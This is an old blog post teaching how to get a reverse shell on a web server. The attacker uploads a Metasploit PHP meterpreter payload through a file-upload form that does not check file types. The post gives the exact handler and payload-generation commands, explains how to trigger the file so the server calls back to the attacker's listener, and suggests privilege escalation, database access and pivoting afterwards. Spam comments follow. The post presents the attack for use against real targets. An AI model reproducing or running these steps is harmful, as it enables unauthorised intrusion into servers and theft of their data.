Tuesday, April 3, 2012

Deploying payload via PHP

Another fun way to deploy our meterpreter payload is with php.

Many webservers allow file uploads for things like image files to be displayed on the page. If the upload form neglects to verify the filetype this can allow us to upload a php file including our payload, and then trick the server into executing it. Alternatively, this payload could be injected into a forum post or some such thing.

First thing we do, is start up a meterpreter handler using the PHP method, like this:
/opt/metasploit-4.2.0/app/msfcli multi/handler payload=php/meterpreter/reverse_tcp lhost="LISTENER IP" lport="PORT" ExitOnSession=false J


Now we create our meterpreter php payload file. This command will create the php payload, and save it as m.php
/opt/metasploit-4.2.0/app/msfpayload php/meterpreter/reverse_tcp LHOST="LISTENER IP" LPORT="PORT" R > ~/m.php



Now we simply upload our php script like we would with an image file.



Then we navigate a browser to the location that server usually hosts images, and click on the file we just uploaded.


The server runs our m.php, causing the server to connect to our meterpreter handler on the specified port, and give us a shell on the target server. In this case, the process is running as the apache user.




We can now attempt to escalate privileges to gain root/SYSTEM, or we can just look around to see what all we've actually gained access to. Chances are that we have database or other files on this system that apache can access, or perhaps we'll just want to pivot through this target to attack something more sensitive behind the firewall that's not directly accessible from the outside world.

5 comments:

  1. hi how can i uploads my php file please

    ReplyDelete
  2. Pretty interesting post! Thanks it was interesting. into a link

    ReplyDelete
  3. The fellowship application personal statement is the best way to tell them what you are capable of, and our professionals know how to write you something that will get results.

    ReplyDelete
  4. Collections from the design labels such as Cheap TRX and other beauty are released after every six months.
    With every new launch, a new trx pas cher technology is developed.
    This had led to making trx pas cher remain competitive in the International market.
    The entire penny board hot sale packaging process is paid into detail to enhance the collections quality and appearance.
    Now everyone can own high-end designer Cheap TRX For Sale.
    cheap trx being one of the largest and most prominent fashion company in the world, it has an obligation of beating the standards set by others.
    The fashion world, with a higher concentration on trx france, needs to provide the best packaging services that the modern world has ever seen.
    cheap trx plays a major role in creating a brand name that fashion lovers want to identify with.

    ReplyDelete
  5. BlueHost is ultimately the best hosting provider for any hosting services you might require.

    ReplyDelete